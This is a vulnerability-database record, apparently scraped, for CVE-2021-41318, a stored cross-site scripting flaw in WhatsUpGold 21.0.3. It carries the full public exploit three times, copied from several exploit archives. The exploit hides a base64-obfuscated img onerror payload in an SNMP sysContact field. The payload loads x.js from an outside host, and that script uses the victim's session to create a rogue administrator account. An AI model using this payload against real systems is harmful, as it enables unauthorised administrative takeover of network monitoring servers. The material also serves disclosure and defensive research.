WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)

2021-10-01T00:00:00

Description

{"id": "EDB-ID:50366", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)", "description": "", "published": "2021-10-01T00:00:00", "modified": "2021-10-01T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://www.exploit-db.com/exploits/50366", "reporter": "Andreas Finstad", "references": [], "cvelist": ["2021-41318", "CVE-2021-41318"], "immutableFields": [], "lastseen": "2022-08-12T04:51:46", "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-41318"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164359"]}, {"type": "zdt", "idList": ["1337DAY-ID-36841"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-41318"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164359"]}, {"type": "zdt", "idList": ["1337DAY-ID-36841"]}]}, "exploitation": null, "vulnersScore": -0.1}, "_state": {"dependencies": 1660280123, "score": 1660280160}, "_internal": {"score_hash": "974a86e0867e593f2eacae457fd5af47"}, "sourceHref": "https://www.exploit-db.com/download/50366", "sourceData": "# Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)\r\n# Date: 09.17.2021\r\n# Exploit Author: Andreas Finstad (4ndr34z)\r\n# Vendor Homepage: https://www.whatsupgold.com\r\n# Version: v.21.0.3, Build 188\r\n# Tested on: Windows 2019 Server\r\n# CVE : CVE-2021-41318\r\n# Reference: https://f20.be/cves/poc-cve-2021-41318\r\n\r\nDescription:\r\nImproper validation of strings from discovered SNMP devices, makes the application prone to stored XXS attacks.\r\nPlacing a XSS payload in one of the fields reflected onto the application, triggers the exploitation.\r\nNo CSRF protection/token on adding/posting a new user account, makes it possible to create a rouge administrator, using a staged javascript delivered through the XSS.\r\n\r\nSNMP A nix computer placed on a subnet accessible from the server for discovery, you edit the SNMPd.conf, adding the payload:\r\n\r\n# snmpd.conf\r\n# An example configuration file for configuring the Net-SNMP agent ('snmpd')\r\n# See snmpd.conf(5) man page for details\r\n############################################################################\r\n# SECTION: System Information Setup\r\n# syslocation: The [typically physical] location of the system.\r\n# Note that setting this value here means that when trying to\r\n# perform an snmp SET operation to the sysLocation.0 variable will make\r\n# the agent return the \"notWritable\" error code. IE, including\r\n# this token in the snmpd.conf file will disable write access to\r\n# the variable.\r\n# arguments: location_string\r\nsysName Evil-Device\r\nsysLocation Somewhere Over The Rainbow\r\nsysContact <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly8xOTIuMTY4LjY2LjQ2L3guanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 src=x onerror=eval(atob(this.id))>\r\n\r\nThis is the base64 encoded string:\r\nvar a=document.createElement(\"script\");a.src=\"http://192.168.66.46/x.js\";document.body.appendChild(a);\r\n\r\nx.js:\r\nvar vhost = window.location.protocol+'\\/\\/'+window.location.host\r\nvar username = \"sysadmin\"\r\nvar password = \"me\"\r\n\r\nfetch(vhost+'/NmConsole/api/core/WebUser',{\r\n method: 'POST',\r\n headers: {\r\n 'Content-Length': '479',\r\n 'Accept': 'application/json',\r\n 'X-Requested-With': 'XMLHttpRequest',\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51',\r\n 'Content-Type': 'application/json',\r\n 'Origin': vhost,\r\n 'Referer': vhost+'/NmConsole/',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4',\r\n 'Connection': 'close'\r\n },\r\n credentials: 'include',\r\n body: '{\"HomeDeviceGroupID\":0,\"HomeDeviceGroupPath\":\"My Network\",\"LanguageID\":1033,\"UserRightsMask\":\"0\",\"IsDgarConfigured\":false,\"Groups\" [1],\"WebUserID\":-1,\"UserName\":\"'+username+'\",\"AuthenticationType\":1,\"ApplyWebUiSessionTimeout\":true,\"ApplyLockoutPolicy\":false,\"ApplyPasswordAging\":false,\"ApplyPasswordComplexity\":false,\"ApplySessionPolicy\":false,\"FailedLoginCount\":0,\"IsLocked\":false,\"Password\":\"'+password+'\",\"UnlockUser\":false,\"WebConfigurationSettings\":\"\",\"id\":\"Wug.model.userManagement.WebUser-2\"}'\r\n});", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{"zdt": [{"lastseen": "2021-12-20T06:09:01", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-10-01T00:00:00", "type": "zdt", "title": "WhatsUpGold 21.0.3 - Stored Cross-Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41318"], "modified": "2021-10-01T00:00:00", "id": "1337DAY-ID-36841", "href": "https://0day.today/exploit/description/36841", "sourceData": "# Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)\n# Exploit Author: Andreas Finstad (4ndr34z)\n# Vendor Homepage: https://www.whatsupgold.com\n# Version: v.21.0.3, Build 188\n# Tested on: Windows 2019 Server\n# CVE : CVE-2021-41318\n# Reference: https://f20.be/cves/poc-cve-2021-41318\n\nDescription:\nImproper validation of strings from discovered SNMP devices, makes the application prone to stored XXS attacks.\nPlacing a XSS payload in one of the fields reflected onto the application, triggers the exploitation.\nNo CSRF protection/token on adding/posting a new user account, makes it possible to create a rouge administrator, using a staged javascript delivered through the XSS.\n\nSNMP A nix computer placed on a subnet accessible from the server for discovery, you edit the SNMPd.conf, adding the payload:\n\n# snmpd.conf\n# An example configuration file for configuring the Net-SNMP agent ('snmpd')\n# See snmpd.conf(5) man page for details\n############################################################################\n# SECTION: System Information Setup\n# syslocation: The [typically physical] location of the system.\n# Note that setting this value here means that when trying to\n# perform an snmp SET operation to the sysLocation.0 variable will make\n# the agent return the \"notWritable\" error code. IE, including\n# this token in the snmpd.conf file will disable write access to\n# the variable.\n# arguments: location_string\nsysName Evil-Device\nsysLocation Somewhere Over The Rainbow\nsysContact <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly8xOTIuMTY4LjY2LjQ2L3guanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 src=x onerror=eval(atob(this.id))>\n\nThis is the base64 encoded string:\nvar a=document.createElement(\"script\");a.src=\"http://192.168.66.46/x.js\";document.body.appendChild(a);\n\nx.js:\nvar vhost = window.location.protocol+'\\/\\/'+window.location.host\nvar username = \"sysadmin\"\nvar password = \"me\"\n\nfetch(vhost+'/NmConsole/api/core/WebUser',{\n method: 'POST',\n headers: {\n 'Content-Length': '479',\n 'Accept': 'application/json',\n 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51',\n 'Content-Type': 'application/json',\n 'Origin': vhost,\n 'Referer': vhost+'/NmConsole/',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4',\n 'Connection': 'close'\n },\n credentials: 'include',\n body: '{\"HomeDeviceGroupID\":0,\"HomeDeviceGroupPath\":\"My Network\",\"LanguageID\":1033,\"UserRightsMask\":\"0\",\"IsDgarConfigured\":false,\"Groups\" [1],\"WebUserID\":-1,\"UserName\":\"'+username+'\",\"AuthenticationType\":1,\"ApplyWebUiSessionTimeout\":true,\"ApplyLockoutPolicy\":false,\"ApplyPasswordAging\":false,\"ApplyPasswordComplexity\":false,\"ApplySessionPolicy\":false,\"FailedLoginCount\":0,\"IsLocked\":false,\"Password\":\"'+password+'\",\"UnlockUser\":false,\"WebConfigurationSettings\":\"\",\"id\":\"Wug.model.userManagement.WebUser-2\"}'\n});\n", "sourceHref": "https://0day.today/exploit/36841", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T19:16:07", "description": "In Progress WhatsUp Gold prior to version 21.1.0, an application endpoint failed to adequately sanitize malicious input. which could allow an unauthenticated attacker to execute arbitrary code in a victim's browser.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-09-28T18:15:00", "type": "cve", "title": "CVE-2021-41318", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41318"], "modified": "2021-10-07T12:45:00", "cpe": [], "id": "CVE-2021-41318", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41318", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-10-01T16:01:57", "description": "", "cvss3": {}, "published": "2021-10-01T00:00:00", "type": "packetstorm", "title": "WhatsUpGold 21.0.3 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41318"], "modified": "2021-10-01T00:00:00", "id": "PACKETSTORM:164359", "href": "https://packetstormsecurity.com/files/164359/WhatsUpGold-21.0.3-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS) \n# Date: 09.17.2021 \n# Exploit Author: Andreas Finstad (4ndr34z) \n# Vendor Homepage: https://www.whatsupgold.com \n# Version: v.21.0.3, Build 188 \n# Tested on: Windows 2019 Server \n# CVE : CVE-2021-41318 \n# Reference: https://f20.be/cves/poc-cve-2021-41318 \n \nDescription: \nImproper validation of strings from discovered SNMP devices, makes the application prone to stored XXS attacks. \nPlacing a XSS payload in one of the fields reflected onto the application, triggers the exploitation. \nNo CSRF protection/token on adding/posting a new user account, makes it possible to create a rouge administrator, using a staged javascript delivered through the XSS. \n \nSNMP A nix computer placed on a subnet accessible from the server for discovery, you edit the SNMPd.conf, adding the payload: \n \n# snmpd.conf \n# An example configuration file for configuring the Net-SNMP agent ('snmpd') \n# See snmpd.conf(5) man page for details \n############################################################################ \n# SECTION: System Information Setup \n# syslocation: The [typically physical] location of the system. \n# Note that setting this value here means that when trying to \n# perform an snmp SET operation to the sysLocation.0 variable will make \n# the agent return the \"notWritable\" error code. IE, including \n# this token in the snmpd.conf file will disable write access to \n# the variable. \n# arguments: location_string \nsysName Evil-Device \nsysLocation Somewhere Over The Rainbow \nsysContact <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly8xOTIuMTY4LjY2LjQ2L3guanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 src=x onerror=eval(atob(this.id))> \n \nThis is the base64 encoded string: \nvar a=document.createElement(\"script\");a.src=\"http://192.168.66.46/x.js\";document.body.appendChild(a); \n \nx.js: \nvar vhost = window.location.protocol+'\\/\\/'+window.location.host \nvar username = \"sysadmin\" \nvar password = \"me\" \n \nfetch(vhost+'/NmConsole/api/core/WebUser',{ \nmethod: 'POST', \nheaders: { \n'Content-Length': '479', \n'Accept': 'application/json', \n'X-Requested-With': 'XMLHttpRequest', \n'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51', \n'Content-Type': 'application/json', \n'Origin': vhost, \n'Referer': vhost+'/NmConsole/', \n'Accept-Encoding': 'gzip, deflate', \n'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4', \n'Connection': 'close' \n}, \ncredentials: 'include', \nbody: '{\"HomeDeviceGroupID\":0,\"HomeDeviceGroupPath\":\"My Network\",\"LanguageID\":1033,\"UserRightsMask\":\"0\",\"IsDgarConfigured\":false,\"Groups\" [1],\"WebUserID\":-1,\"UserName\":\"'+username+'\",\"AuthenticationType\":1,\"ApplyWebUiSessionTimeout\":true,\"ApplyLockoutPolicy\":false,\"ApplyPasswordAging\":false,\"ApplyPasswordComplexity\":false,\"ApplySessionPolicy\":false,\"FailedLoginCount\":0,\"IsLocked\":false,\"Password\":\"'+password+'\",\"UnlockUser\":false,\"WebConfigurationSettings\":\"\",\"id\":\"Wug.model.userManagement.WebUser-2\"}' \n}); \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164359/whatsupgold2103-xss.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}

WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)

Description

Related